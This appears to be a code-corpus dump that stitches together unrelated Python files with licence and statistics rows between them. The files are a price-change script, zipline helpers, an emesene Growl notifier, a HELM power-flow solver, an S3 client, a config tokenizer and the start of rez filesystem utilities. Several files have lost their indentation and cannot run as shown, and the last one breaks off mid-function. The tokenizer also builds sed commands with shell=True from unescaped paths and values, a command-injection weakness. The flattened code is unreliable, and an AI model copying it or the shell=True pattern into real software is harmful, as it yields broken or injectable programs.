try:
conn.execute("truncate PriceChange")
        result = conn.execute("SELECT id FROM Entity")
        users = result.fetchall()
for user in users:
eid = user[0]
            for mysql_interval, term in (("INTERVAL 1 DAY", "1D"),
                                         ("INTERVAL 7 DAY", "7D"),
                                         ("INTERVAL 1 MONTH", "1M"),
                                         ("INTERVAL 3 MONTH", "3M"),
                                         ("INTERVAL 6 MONTH", "6M"),
                                         ("INTERVAL 1 YEAR", "1Y")):
                change = calculate_price_change(conn, eid, mysql_interval)
                if change is None:
                    change = 0
                insert_price_change(conn, eid, term, change)
trans.commit()
except:
trans.rollback()
raise
conn.close()
log.info('..done.')
def main():
calculate_price_changes()
if __name__ == "__main__":
main()
|
lgpl-3.0
| -6,761,154,637,958,323,000
| 31.026316
| 117
| 0.547061
| false
| 4.048253
| false
| false
| false
|
lsbardel/zipline
|
zipline/gens/utils.py
|
1
|
2276
|
#
# Copyright 2013 Quantopian, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pytz
import numbers
from hashlib import md5
from datetime import datetime
from zipline.protocol import DATASOURCE_TYPE
from six import iteritems, b
def hash_args(*args, **kwargs):
"""Define a unique string for any set of representable args."""
arg_string = '_'.join([str(arg) for arg in args])
kwarg_string = '_'.join([str(key) + '=' + str(value)
for key, value in iteritems(kwargs)])
combined = ':'.join([arg_string, kwarg_string])
hasher = md5()
hasher.update(b(combined))
return hasher.hexdigest()
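# Illustrative sketch: hash_args builds one stable md5 digest for any mix of
# positional and keyword arguments (the argument values here are made up).
def _example_hash_args():
    key = hash_args('AAPL', 10, frequency='daily')
    assert isinstance(key, str) and len(key) == 32  # md5 hex digest
    return key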
def assert_datasource_protocol(event):
"""Assert that an event meets the protocol for datasource outputs."""
assert event.type in DATASOURCE_TYPE
# Done packets have no dt.
if not event.type == DATASOURCE_TYPE.DONE:
assert isinstance(event.dt, datetime)
assert event.dt.tzinfo == pytz.utc
def assert_trade_protocol(event):
"""Assert that an event meets the protocol for datasource TRADE outputs."""
assert_datasource_protocol(event)
assert event.type == DATASOURCE_TYPE.TRADE
assert isinstance(event.sid, int)
assert isinstance(event.price, numbers.Real)
assert isinstance(event.volume, numbers.Integral)
assert isinstance(event.dt, datetime)
def assert_datasource_unframe_protocol(event):
"""Assert that an event is valid output of zp.DATASOURCE_UNFRAME."""
assert event.type in DATASOURCE_TYPE
def assert_sort_protocol(event):
"""Assert that an event is valid input to zp.FEED_FRAME."""
assert event.type in DATASOURCE_TYPE
def assert_sort_unframe_protocol(event):
"""Same as above."""
assert event.type in DATASOURCE_TYPE
|
apache-2.0
| -6,486,776,239,556,615,000
| 30.178082
| 79
| 0.710018
| false
| 3.917384
| false
| false
| false
|
emesene/emesene
|
emesene/gui/common/GNTPNotification.py
|
1
|
2006
|
# -*- coding: utf-8 -*-
# This file is part of emesene.
#
# emesene is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# emesene is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with emesene; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
import gntp.notifier
import sys
import gui
from gui.base import Plus
NAME = 'GNTPNotification'
DESCRIPTION = 'Wrapper around GNTP for the notification system'
AUTHOR = 'joshf'
WEBSITE = 'www.github.com/joshf'
VERSION = '1.1'
def GNTPNotification(title, text, picture_path=None, const=None,
callback=None, tooltip=None):
title = Plus.msnplus_strip(title)
if sys.platform == 'darwin':
appicon = open(gui.theme.image_theme.logo).read()
imagepath = picture_path.replace( "file:///", "/" )
icon = open(imagepath).read()
else:
appicon = gui.theme.image_theme.logo
icon = picture_path
growl = gntp.notifier.GrowlNotifier(
applicationName = "emesene",
applicationIcon = appicon,
notifications = ["Generic Notification"],
defaultNotifications = ["Generic Notification"],
# hostname = "computer.example.com", # Defaults to localhost
# password = "abc123" # Defaults to a blank password
)
growl.register()
growl.notify(
noteType = "Generic Notification",
title = title,
description = text,
icon = icon,
sticky = False,
priority = 1,
)
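# Illustrative sketch (not part of the original module): how calling code might
# fire a notification through this wrapper. The title, text and icon path are
# made-up values; a running Growl/GNTP service is assumed.
def _example_notify():
    GNTPNotification('emesene', 'new message from a contact',
                     picture_path=gui.theme.image_theme.logo)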
|
gpl-3.0
| -8,234,481,197,409,525,000
| 30.84127
| 79
| 0.659023
| false
| 3.820952
| false
| false
| false
|
SanPen/GridCal
|
src/research/power_flow/helm/old/Helm.py
|
1
|
19811
|
# -*- coding: utf-8 -*-
# This file is part of GridCal.
#
# GridCal is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# GridCal is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GridCal. If not, see <http://www.gnu.org/licenses/>.
import Desarrollos.power_flow_research.example_grids as grids
import numpy as np
np.set_printoptions(linewidth=320)
# np.set_printoptions(precision=6, suppress=True, linewidth=320)
from numpy import where, zeros, ones, mod, conj, array, dot, complex128
from numpy import poly1d, r_, eye, hstack, diag, linalg, Inf
from enum import Enum
from itertools import product
from scipy import fftpack
from scipy.linalg import solve
from scipy.sparse.linalg import factorized, spsolve
from scipy.sparse import issparse, csc_matrix as sparse
# just in time compiler
# from numba import jit
# Set the complex precision to use
complex_type = complex128
class NodeType(Enum):
PQ = 1,
PV = 2,
REF = 3,
NONE = 4,
STO_DISPATCH = 5 # Storage dispatch, in practice it is the same as REF
# @jit(cache=True)
def pre_process(n_bus, Yseries, Vset, pq, pv, vd):
"""
Make the Helm System matrix
@param n_bus: Number of buses of the circuit
@param Yseries: Circuit admittance matrix of the series elements
@param Vset: Vector of voltages of those nodes where the voltage is controlled (AKA Slack and PV buses)
@param pq: list of PQ node indices
@param pv: list of PV node indices
@param vd: list of Slack node indices
@return:
"""
"""
Reduction of the circuit magnitudes.
Args:
n_bus:
Yseries:
slack_indices: Array of indices of the slack nodes
Vset:
S:
Output:
Yred: Reduced admittance matrix (Without the rows and columns belonging to slack buses)
I: Matrix of currents (In practice only one slack bus is selected, hence it is a vector) injected by the slack buses
Sred: Array of power injections of the buses that are not of type slack
types_red: Array of types of the buses that are not of type slack
non_slack_indices: Array of indices of the buses that are not of type slack
"""
# now to have efficient arrays of coefficients
map_idx = zeros(n_bus, dtype=np.int)
map_w = zeros(n_bus, dtype=np.int)
npq = 0
npv = 0
npqpv = 0
for i in pq:
map_idx[i] = npq
map_w[i] = npqpv
npq += 1
npqpv += 1
for i in pv:
map_idx[i] = npv
map_w[i] = npqpv
npv += 1
npqpv += 1
# build the expanded system matrix
Ysys = zeros((2*n_bus, 2*n_bus))
for a, b in product(range(n_bus), range(n_bus)):
Ysys[2*a, 2*b] = Yseries[a, b].real
Ysys[2*a, 2*b+1] = -Yseries[a, b].imag
Ysys[2*a+1, 2*b] = Yseries[a, b].imag
Ysys[2*a+1, 2*b+1] = Yseries[a, b].real
# set pv column
for a in pv:
b = a
Ysys[:, 2*b] = zeros(2 * n_bus)
# Ysys[a*2, b*2+1] = 0
Ysys[a*2+1, b*2] = 1
# set vd elements
for a in vd:
Ysys[a*2, :] = zeros(2 * n_bus)
Ysys[a*2 + 1, :] = zeros(2 * n_bus)
Ysys[a*2, a*2] = 1
Ysys[a*2+1, a*2+1] = 1
# print('Ysys\n', Ysys)
# build the PV matrix
Ypv = zeros((2 * n_bus, npv))
for a, b in product(r_[pq, pv], pv):
kk = map_idx[b]
Ypv[2*a, kk] = Yseries[a, b].real
Ypv[2*a+1, kk] = Yseries[a, b].imag
# print('Ypv\n', Ypv)
Vset2 = Vset * Vset
return sparse(Ysys), Ypv, Vset2, map_idx, map_w, npq, npv
# @jit(cache=True)
def RHS(n, nbus, Ysh, Ypv, S, Vset, Vset_abs2, C, W, Q, pq, pv, vd, map_idx, map_w):
"""
Right hand side calculation.
Args:
n: Order of the coefficients
nbus: Number of buses (not counting the slack buses)
        Ysh: Vector of shunt admittances (nbus elements)
        Ypv: Columns of the series admittance matrix for the PV buses, expanded to real/imaginary form (2*nbus x npv)
        S: Vector of power injections (nbus elements)
        Vset: Vector of set voltages
        Vset_abs2: Vector with the voltage set points squared (nbus elements)
        C: Voltage coefficients (Ncoeff x nbus elements)
        W: Inverse voltage coefficients (Ncoeff x npq+npv elements)
        Q: Reactive power coefficients of the PV buses (Ncoeff x npv elements)
        pq, pv, vd: Lists of PQ, PV and slack bus indices
        map_idx, map_w: Index maps from bus number to PV / coefficient positions
    Output:
        rhs: Right hand side vector to solve the coefficients (2 * nbus elements)
        Vre: Real part of the voltage for the PV buses (npv elements)
"""
rhs = np.empty(2 * nbus)
Vre = ones(len(pv))
for k in pq:
val = RHS_PQ(n, k, Ysh, C, S, W, map_w)
rhs[2 * k] = val.real
rhs[2 * k + 1] = val.imag
for k in vd:
val = RHS_VD(n, k, Vset)
rhs[2 * k] = val.real
rhs[2 * k + 1] = val.imag
for k in pv:
val = RHS_PV(n, k, Ysh, S, C, Q, W, map_idx, map_w)
rhs[2 * k] = val.real
rhs[2 * k + 1] = val.imag
kk = map_idx[k]
Vre[kk] = calc_Vre(n, k, C, Vset_abs2).real
rhs -= Ypv[:, kk] * Vre[kk]
return rhs, Vre
def delta(n, k):
return n == k # is 1 for n==k, 0 otherwise
# @jit(cache=True)
def RHS_VD(n, k, Vset):
"""
Right hand side calculation for a PQ bus.
Args:
n: Order of the coefficients
k: Index of the bus
Vset: set voltage of the node
Output:
Right hand side value for slack nodes
"""
if n == 0:
return complex_type(1) * delta(n, 0)
else:
return (Vset[k] - complex_type(1)) * delta(n, 1)
# @jit(cache=True)
def RHS_PQ(n, k, Ysh, C, S, W, map_w):
"""
Right hand side calculation for a PQ bus.
Args:
n: Order of the coefficients
k: Index of the bus
        Ysh: Vector of shunt admittances (nbus elements)
        C: Voltage coefficients (Ncoeff x nbus elements)
        S: Vector of power injections (nbus elements)
        W: Inverse voltage coefficients (Ncoeff x npq+npv elements)
        map_w: Index map from bus number to position in W
Output:
Right hand side value
"""
if n == 0:
return 0
else:
kw = map_w[k]
return conj(S[k]) * conj(W[n-1, kw]) - Ysh[k] * C[n - 1, k] # ASU version
def calc_W(n, k, kw, C, W):
"""
Calculation of the inverse coefficients W. (only applicable for PQ buses)
Args:
n: Order of the coefficients
k: Index of the bus
C: Voltage coefficients (Ncoeff x nbus elements)
W: Inverse coefficients structure (Ncoeff x nbus elements)
Output:
Inverse coefficient of order n for the bus k
"""
if n == 0:
res = complex_type(1)
else:
res = complex_type(0)
for l in range(n):
res -= W[l, kw] * C[n-l, k]
res /= conj(C[0, k])
return res
def RHS_PV(n, k, Ysh, S, C, Q, W, map_idx, map_w):
"""
    Right hand side calculation for a PV bus.
Args:
n: Order of the coefficients
k: Index of the bus
        Ysh: Vector where every element is the sum of the corresponding row of the shunt admittance matrix
S: Vector of power injections (nbus elements)
C: Voltage coefficients (Ncoeff x nbus elements)
Q: Reactive power coefficients (Ncoeff x nbus elements)
W: Inverse coefficients structure (Ncoeff x nbus elements)
Output:
Right hand side value for the pv nodes
"""
if n == 0:
return 0 # -1j * Q[0, kk] / conj(C[0, k])
else:
kk = map_idx[k]
kw = map_w[k]
val = complex_type(0)
for l in range(1, n): # this includes the n-1
val += Q[l, kk] * W[n-l, kw].conjugate()
n1 = n-1
rhs = S[k].real * W[n1, kw].conjugate() - (1j * val) - Ysh[k] * C[n1, k]
return rhs
def calc_Vre(n, k, C, Vset_abs2):
"""
    Compute the real part of the voltage for PV nodes
Args:
n: order
k: PV node index
C: Structure of voltage coefficients
Vset_abs2: Square of the set voltage module
Returns:
Real part of the voltage for the PV nodes
"""
# vre = delta(n, 0) + 0.5 * delta(n, 1) * (Vset_abs2[k] - 1) - 0.5 * R
if n == 0:
return complex_type(1)
elif n == 1:
R = calc_R(n, k, C)
return 0.5 * (Vset_abs2[k] - 1) - 0.5 * R
else:
return complex_type(0)
def calc_R(n, k, C):
"""
Convolution coefficient
Args:
n: Order of the coefficients
k: Index of the bus
C: Voltage coefficients (Ncoeff x nbus elements)
Output:
Convolution coefficient of order n for the bus k
"""
result = complex_type(0)
for l in range(n+1):
result += C[l, k] * C[n-l, k].conjugate()
return result
def epsilon(Sn, n, E):
"""
Fast recursive Wynn's epsilon algorithm from:
NONLINEAR SEQUENCE TRANSFORMATIONS FOR THE ACCELERATION OF CONVERGENCE
AND THE SUMMATION OF DIVERGENT SERIES
by Ernst Joachim Weniger
"""
Zero = complex_type(0)
One = complex_type(1)
Tiny = np.finfo(complex_type).min
Huge = np.finfo(complex_type).max
E[n] = Sn
if n == 0:
estim = Sn
else:
AUX2 = Zero
for j in range(n, 0, -1): # range from n to 1 (both included)
AUX1 = AUX2
AUX2 = E[j-1]
DIFF = E[j] - AUX2
if abs(DIFF) <= Tiny:
E[j-1] = Huge
else:
if DIFF == 0:
DIFF = Tiny
E[j-1] = AUX1 + One / DIFF
if mod(n, 2) == 0:
estim = E[0]
else:
estim = E[1]
return estim, E
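# Illustrative sketch (not part of the original solver): accelerating the
# partial sums of the alternating harmonic series, which converge to ln(2),
# with the progressive epsilon routine above.
def _example_epsilon():
    terms = 12
    E = zeros(terms + 1, dtype=complex_type)
    Sn = complex_type(0)
    estim = Sn
    for n in range(terms):
        Sn += (-1.0) ** n / (n + 1)  # partial sums of 1 - 1/2 + 1/3 - ...
        estim, E = epsilon(Sn, n, E)
    return estim  # expected to be much closer to ln(2) ~ 0.6931 than the raw sum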
def pade_approximation(n, an, s=1):
"""
Computes the n/2 pade approximant of the series an at the approximation
point s
Arguments:
an: coefficient series
n: order of the series
s: point of approximation
Returns:
pade approximation at s
"""
nn = int(n/2)
if mod(nn, 2) == 0:
nn -= 1
L = nn
M = nn
an = np.ndarray.flatten(an)
rhs = an[L+1:L+M+1]
C = zeros((L, M), dtype=complex_type)
for i in range(L):
k = i + 1
C[i, :] = an[L-M+k:L+k]
try:
b = solve(C, -rhs) # bn to b1
except:
print()
return 0, zeros(L+1, dtype=complex_type), zeros(L+1, dtype=complex_type)
b = r_[1, b[::-1]] # b0 = 1
a = zeros(L+1, dtype=complex_type)
a[0] = an[0]
for i in range(L):
val = complex_type(0)
k = i + 1
for j in range(k+1):
val += an[k-j] * b[j]
a[i+1] = val
p = complex_type(0)
q = complex_type(0)
for i in range(L+1):
p += a[i] * s**i
q += b[i] * s**i
return p/q, a, b
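# Illustrative sketch (not part of the original solver): the Padé approximant of
# the truncated exponential series evaluated at s=1 should be close to e.
def _example_pade():
    from math import factorial, e
    order = 9
    an = np.array([1.0 / factorial(i) for i in range(order + 1)], dtype=complex_type)
    value, _, _ = pade_approximation(order, an, s=1)
    return abs(value - e)  # expected to be close to zero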
def interprete_solution(nbus, npv, pv, pqvd, x_sol, Vre, map_idx):
"""
Assign the solution vector individual values to the correct places
Args:
nbus: number of system nodes
npv: number of pv nodes
types: types of each node
x_sol: solution vector to analyze
Vre: Vector or real part of the voltage for the PV nodes
map_idx: mapping array from normal bus index to PV index
Returns:
Voltages coefficients and reactive power coefficients for the PV nodes at the order of x_sol
"""
C = zeros(nbus, dtype=complex_type)
Q = zeros(npv)
# for k in pqvd: # non vectorized code
# C[k] = x_sol[2 * k] + 1j * x_sol[2 * k + 1]
# set the PQ and Slack nodes
C[pqvd] = x_sol[2 * pqvd] + 1j * x_sol[2 * pqvd + 1]
# for k in pv: # non vectorized code
# kk = map_idx[k]
# Q[kk] = x_sol[2 * k]
# C[k] = Vre[kk] + 1j * x_sol[2 * k + 1]
# Set the PV nodes
kk = map_idx[pv]
Q[kk] = x_sol[2 * pv]
C[pv] = Vre[kk] + 1j * x_sol[2 * pv + 1]
return C, Q
def helm(Y, Ys, Ysh, max_coefficient_count, S, voltage_set_points, pq, pv, vd, eps=1e-3, use_pade=True):
"""
Run the holomorphic embedding power flow
@param Y: Circuit complete admittance matrix
@param Ys: Circuit series elements admittance matrix
@param Ysh: Circuit shunt elements admittance matrix
@param max_coefficient_count: Maximum number of voltage coefficients to evaluate (Must be an odd number)
@param S: Array of power injections matching the admittance matrix size
@param voltage_set_points: Array of voltage set points matching the admittance matrix size
@param pq: list of PQ node indices
@param pv: list of PV node indices
@param vd: list of Slack node indices
@param eps: Tolerance
@param use_pade: Use the Padé approximation? If False the Epsilon algorithm is used
@return:
"""
nbus = np.shape(Ys)[0]
# The routines in this script are meant to handle sparse matrices, hence non-sparse ones are not allowed
assert(issparse(Ys))
# assert(not np.all((Ys + sparse(np.eye(nbus) * Ysh) != Y).data))
# Make bus type lists combinations that are going to be used later
pqvd = r_[pq, vd]
pqvd.sort()
pqpv = r_[pq, pv]
pqpv.sort()
print('Ymat:\n', Y.todense())
print('Yseries:\n', Ys.todense())
print('Yshunt:\n', Ysh)
# prepare the arrays
Ysys, Ypv, Vset, map_idx, map_w, npq, npv = pre_process(n_bus=nbus, Yseries=Ys, Vset=voltage_set_points,
pq=pq, pv=pv, vd=vd)
print('Ysys:\n', Ysys.todense())
# F = np.zeros(nbus, dtype=complex_type)
# F[Ysh.indices] = Ysh.data
# declare the matrix of coefficients that will lead to the voltage computation
C = zeros((0, nbus), dtype=complex_type)
# auxiliary array for the epsilon algorithm
E_v = zeros((0, nbus), dtype=complex_type)
E_q = zeros((0, npv), dtype=complex_type)
# Declare the inverse coefficients vector
# (it is actually a matrix; a vector of coefficients per coefficient order)
W = zeros((0, npq+npv), dtype=complex_type)
# Reactive power on the PV nodes
Q = zeros((0, npv), dtype=complex_type)
# Squared values of the voltage module for the buses that are not of slack type
Vset_abs2 = abs(voltage_set_points) ** 2
# progressive calculation of coefficients
n = 0
converged = False
inside_precision = True
errors = list()
errors_PV_P = list()
errors_PV_Q = list()
errors_PQ_P = list()
errors_PQ_Q = list()
voltages = list()
Sn_v = zeros(nbus, dtype=complex_type)
Sn_q = zeros(npv, dtype=complex_type)
voltages_vector = zeros(nbus, dtype=complex_type)
Vred_last = zeros(nbus, dtype=complex_type)
solve = factorized(Ysys)
# set the slack indices voltages
voltages_vector[vd] = voltage_set_points[vd]
while n <= max_coefficient_count and not converged and inside_precision:
# Reserve coefficients memory space
C = np.vstack((C, np.zeros((1, nbus), dtype=complex_type)))
E_v = np.vstack((E_v, np.zeros((1, nbus), dtype=complex_type)))
E_q = np.vstack((E_q, np.zeros((1, npv))))
W = np.vstack((W, np.zeros((1, npq+npv), dtype=complex_type)))
Q = np.vstack((Q, np.zeros((1, npv), dtype=complex_type)))
# get the system independent term to solve the coefficients
# n, nbus, F, Ypv, S, Vset, Vset_abs2, C, W, Q, pq, pv, vd, map_idx, map_w,
rhs, Vre = RHS(n, nbus, Ysh, Ypv, S, Vset, Vset_abs2, C, W, Q, pq, pv, vd, map_idx, map_w)
# Solve the linear system to obtain the new coefficients
x_sol = solve(rhs)
# assign the voltages and the reactive power values correctly
C[n, :], Q[n, :] = interprete_solution(nbus, npv, pv, pqvd, x_sol, Vre, map_idx)
# copy variables for the epsilon algorithm
if not use_pade:
E_v[n, :] = C[n, :]
E_q[n, :] = Q[n, :]
Sn_v += C[n, :]
Sn_q += Q[n, :]
# Update the inverse voltage coefficients W for the non slack nodes
for k in pqpv:
kw = map_w[k] # actual index in the coefficients structure
W[n, kw] = calc_W(n, k, kw, C, W)
# calculate the reactive power
for k in pv:
kk = map_idx[k]
if use_pade:
if mod(n, 2) == 0 and n > 2:
q, _, _ = pade_approximation(n, Q[:, kk])
S[k] = S[k].real + 1j * q.real
else:
q, E_q[:, kk] = epsilon(Sn_q[kk], n, E_q[:, kk])
S[k] = S[k].real + 1j * q
# calculate the voltages
for k in pqpv:
if use_pade:
if mod(n, 2) == 0 and n > 2:
v, _, _ = pade_approximation(n, C[:, k])
voltages_vector[k] = v
else:
voltages_vector[k], E_v[:, k] = epsilon(Sn_v[k], n, E_v[:, k])
if np.isnan(voltages_vector[k]):
print('Maximum precision reached at ', n)
voltages_vector = Vred_last
inside_precision = False
break
Vred_last = voltages_vector.copy()
# Compose the voltage values from the coefficient series
voltages.append(voltages_vector.copy())
# print(voltages_vector)
# Calculate the error and check the convergence
Scalc = voltages_vector * conj(Y * voltages_vector)
power_mismatch = Scalc - S # complex power mismatch
power_mismatch_ = r_[power_mismatch[pv].real, power_mismatch[pq].real, power_mismatch[pq].imag] # concatenate error by type
# check for convergence
normF = linalg.norm(power_mismatch_, Inf)
errors.append(normF)
errors_PV_P.append(power_mismatch[pv].real)
errors_PV_Q.append(power_mismatch[pv].imag)
errors_PQ_P.append(power_mismatch[pq].real)
errors_PQ_Q.append(power_mismatch[pq].imag)
if normF < eps:
converged = True
else:
converged = False
n += 1 # increase the coefficients order
# errors_lst = [array(errors), array(errors_PV_P), array(errors_PV_Q), array(errors_PQ_P), array(errors_PQ_Q)]
return Vred_last, converged, normF, Scalc
def bifurcation_point(C, slackIndices):
"""
Computes the bifurcation point
@param C:
@return:
"""
npoints = 100
order_num, bus_num = np.shape(C)
# V(S) = P(S)/Q(S)
V = zeros((npoints, bus_num), dtype=complex_type)
L = zeros((npoints, bus_num))
for k in range(bus_num):
if k not in slackIndices:
_, p, q = pade_approximation(order_num, C[:, k])
# print(k, 'P:', p)
# print(k, 'Q:', q)
asint = np.roots(q[::-1])
asint = np.sort(abs(asint))
asint = asint[asint > 2]
print('Asymptotes', asint)
# print('Asymptote:', asint[0])
bpoint = asint[0]
# bpoint = max(asint)
lmda = np.linspace(1, bpoint, npoints+1)[:-1]
# lmda = np.linspace(1, 100, npoints)
pval = np.polyval(p[::-1], lmda)
qval = np.polyval(q[::-1], lmda)
V[:, k] = pval / qval
L[:, k] = lmda
return V, L
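# Illustrative driver (not part of the original file): a hypothetical call to helm()
# on a small system, assuming Y and Ys are scipy.sparse admittance matrices, Ysh is the
# shunt admittance vector, S the complex power injection vector and V0 the voltage set
# points, with bus 0 as slack, bus 1 as PQ and bus 2 as PV:
#
#     V, converged, err, Scalc = helm(Y, Ys, Ysh, max_coefficient_count=30,
#                                     S=S, voltage_set_points=V0,
#                                     pq=[1], pv=[2], vd=[0],
#                                     eps=1e-9, use_pade=True)
#     # V: final bus voltages, err: maximum power mismatch, Scalc: computed injections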
|
gpl-3.0
| -1,298,887,950,109,372,700
| 27.421808
| 132
| 0.570116
| false
| 3.184887
| false
| false
| false
|
RetailMeNot/acky
|
acky/s3.py
|
1
|
4051
|
from acky.api import AwsApiClient
try:
from urllib import parse
except ImportError:
import urlparse as parse
class InvalidURL(Exception):
def __init__(self, url, msg=None):
self.url = url
if not msg:
msg = "Invalid URL: {0}".format(url)
super(InvalidURL, self).__init__(msg)
def _parse_url(url=None):
"""Split the path up into useful parts: bucket, obj_key"""
if url is None:
return ('', '')
scheme, netloc, path, _, _ = parse.urlsplit(url)
if scheme != 's3':
raise InvalidURL(url, "URL scheme must be s3://")
if path and not netloc:
raise InvalidURL(url)
return netloc, path[1:]
class S3(AwsApiClient):
"""Interface for managing S3 buckets. (API Version 2006-03-01)"""
service_name = "s3"
def get(self, url=None, delimiter="/"):
"""Path is an s3 url. Ommiting the path or providing "s3://" as the
path will return a list of all buckets. Otherwise, all subdirectories
and their contents will be shown.
"""
params = {'Delimiter': delimiter}
bucket, obj_key = _parse_url(url)
if bucket:
params['Bucket'] = bucket
else:
return self.call("ListBuckets", response_data_key="Buckets")
if obj_key:
params['Prefix'] = obj_key
objects = self.call("ListObjects", response_data_key="Contents",
**params)
if objects:
for obj in objects:
obj['url'] = "s3://{0}/{1}".format(bucket, obj['Key'])
return objects
def create(self, url):
"""Create a bucket, directory, or empty file."""
bucket, obj_key = _parse_url(url)
if not bucket:
raise InvalidURL(url,
"You must specify a bucket and (optional) path")
if obj_key:
target = "/".join((bucket, obj_key))
else:
target = bucket
return self.call("CreateBucket", bucket=target)
def destroy(self, url, recursive=False):
"""Destroy a bucket, directory, or file. Specifying recursive=True
recursively deletes all subdirectories and files."""
bucket, obj_key = _parse_url(url)
if not bucket:
raise InvalidURL(url,
"You must specify a bucket and (optional) path")
if obj_key:
target = "/".join((bucket, obj_key))
else:
target = bucket
if recursive:
for obj in self.get(url, delimiter=''):
self.destroy(obj['url'])
return self.call("DeleteBucket", bucket=target)
def upload(self, local_path, remote_url):
"""Copy a local file to an S3 location."""
bucket, key = _parse_url(remote_url)
with open(local_path, 'rb') as fp:
return self.call("PutObject", bucket=bucket, key=key, body=fp)
def download(self, remote_url, local_path, buffer_size=8 * 1024):
"""Copy S3 data to a local file."""
bucket, key = _parse_url(remote_url)
response_file = self.call("GetObject", bucket=bucket, key=key)['Body']
with open(local_path, 'wb') as fp:
buf = response_file.read(buffer_size)
while buf:
fp.write(buf)
buf = response_file.read(buffer_size)
def copy(self, src_url, dst_url):
"""Copy an S3 object to another S3 location."""
src_bucket, src_key = _parse_url(src_url)
dst_bucket, dst_key = _parse_url(dst_url)
if not dst_bucket:
dst_bucket = src_bucket
params = {
'copy_source': '/'.join((src_bucket, src_key)),
'bucket': dst_bucket,
'key': dst_key,
}
return self.call("CopyObject", **params)
def move(self, src_url, dst_url):
"""Copy a single S3 object to another S3 location, then delete the
original object."""
self.copy(src_url, dst_url)
self.destroy(src_url)
|
mit
| -417,330,416,866,376,600
| 29.923664
| 78
| 0.555172
| false
| 3.93301
| false
| false
| false
|
idjaw/dot-manager
|
app/core/tokenizer.py
|
1
|
2196
|
from functools import wraps
from re import search
from subprocess import call
from logging import getLogger
from core.exceptions import TokenizationError
log = getLogger("Tokenizer")
def exception_decorator(func):
@wraps(func)
def func_wrapper(*args, **kw):
try:
return func(*args, **kw)
except Exception as e:
log.error("Tokenization failed: {}".format(e))
raise TokenizationError(message=e)
return func_wrapper
class Tokenizer(object):
@exception_decorator
def tokenize(self, file_path, token_list):
log.debug("Tokenizing: {}".format(file_path))
for token in token_list:
call(
'''
sed \
's/{0}\([[:space:]]*=[[:space:]]*\"*\).*[^\"*]/{0}\\1__{0}__/' \
{1} >{1}_new ; mv {1}_new {1}
'''.format(token, file_path),
shell=True
)
log.debug("Tokenized")
@exception_decorator
def replace_tokens_with_actual(self, src_path, tokenized_path, token_list):
token_to_actual_map = self.token_to_actual_data_mapping(
src_path,
token_list
)
for token in token_list:
call(
'''
sed 's/{0}\([[:space:]]*=[[:space:]]*\"*\).*[^\"*]/{0}\\1{2}/' \
{3} >{3}_new ; mv {3}_new {3}
'''.format(
token.strip('_'),
token,
token_to_actual_map.get(token),
tokenized_path
),
shell=True
)
log.debug("Tokenized")
@exception_decorator
def token_to_actual_data_mapping(self, path, token_list):
token_mapper = {}
with open(path) as f:
file_data = f.readlines()
for i in token_list:
stripped = i.strip('_')
for fi in file_data:
matcher = search(
r'({0})\s*=\s*"*(.*[^"*])'.format(stripped), fi
)
if matcher:
token_mapper[i] = matcher.group(2).rstrip()
return token_mapper
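# Illustrative usage sketch (not part of the original file); the file paths and token
# names below are made up. tokenize() rewrites lines such as password = "hunter2" into
# password = "__password__", and replace_tokens_with_actual() later restores the real
# values by reading them back from a reference file:
#
#     tok = Tokenizer()
#     tok.tokenize('/tmp/app.conf', ['password', 'api_key'])
#     tok.replace_tokens_with_actual('/tmp/reference.conf', '/tmp/app.conf',
#                                    ['__password__', '__api_key__'])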
|
mit
| -1,021,853,459,590,033,300
| 29.5
| 80
| 0.473133
| false
| 4.021978
| false
| false
| false
|
nerdvegas/rez
|
src/rez/utils/filesystem.py
|
1
|
20893
|
"""
Filesystem-related utilities.
"""
from __future__ import print_function
from threading import Lock
from tempfile import mkdtemp
from contextlib import contextmanager
from uuid import uuid4
import errno
import weakref
import atexit
import posixpath
import ntpath
import os.path
import shutil
import os
import re
import stat
import platform
from rez.vendor.six import six
from rez.utils.platform_ import platform_
is_windows = platform.system() == "Windows"
class TempDirs(object):
"""Tempdir manager.
Makes tmpdirs and ensures they're cleaned up on program exit.
"""
instances_lock = Lock()
instances = []
def __init__(self, tmpdir, prefix="rez_"):
self.tmpdir = tmpdir
self.prefix = prefix
self.dirs = set()
self.lock = Lock()
with TempDirs.instances_lock:
TempDirs.instances.append(weakref.ref(self))
def mkdtemp(self, cleanup=True):
path = mkdtemp(dir=self.tmpdir, prefix=self.prefix)
if not cleanup:
return path
with self.lock:
self.dirs.add(path)
return path
def __del__(self):
self.clear()
def clear(self):
with self.lock:
if not self.dirs:
return
dirs = self.dirs
self.dirs = set()
for path in dirs:
if os.path.exists(path) and not os.getenv("REZ_KEEP_TMPDIRS"):
shutil.rmtree(path)
@classmethod
def clear_all(cls):
with TempDirs.instances_lock:
instances = cls.instances[:]
for ref in instances:
instance = ref()
if instance is not None:
instance.clear()
atexit.register(TempDirs.clear_all)
@contextmanager
def make_path_writable(path):
"""Temporarily make `path` writable, if possible.
Args:
path (str): Path to make temporarily writable
"""
try:
orig_mode = os.stat(path).st_mode
new_mode = orig_mode
if not os.access(path, os.W_OK):
new_mode = orig_mode | stat.S_IWUSR
# make writable
if new_mode != orig_mode:
os.chmod(path, new_mode)
except OSError:
# ignore access errors here, and just do nothing. It will be more
# intuitive for the calling code to fail on access instead.
#
orig_mode = None
new_mode = None
# yield, then reset mode back to original
try:
yield
finally:
if new_mode != orig_mode:
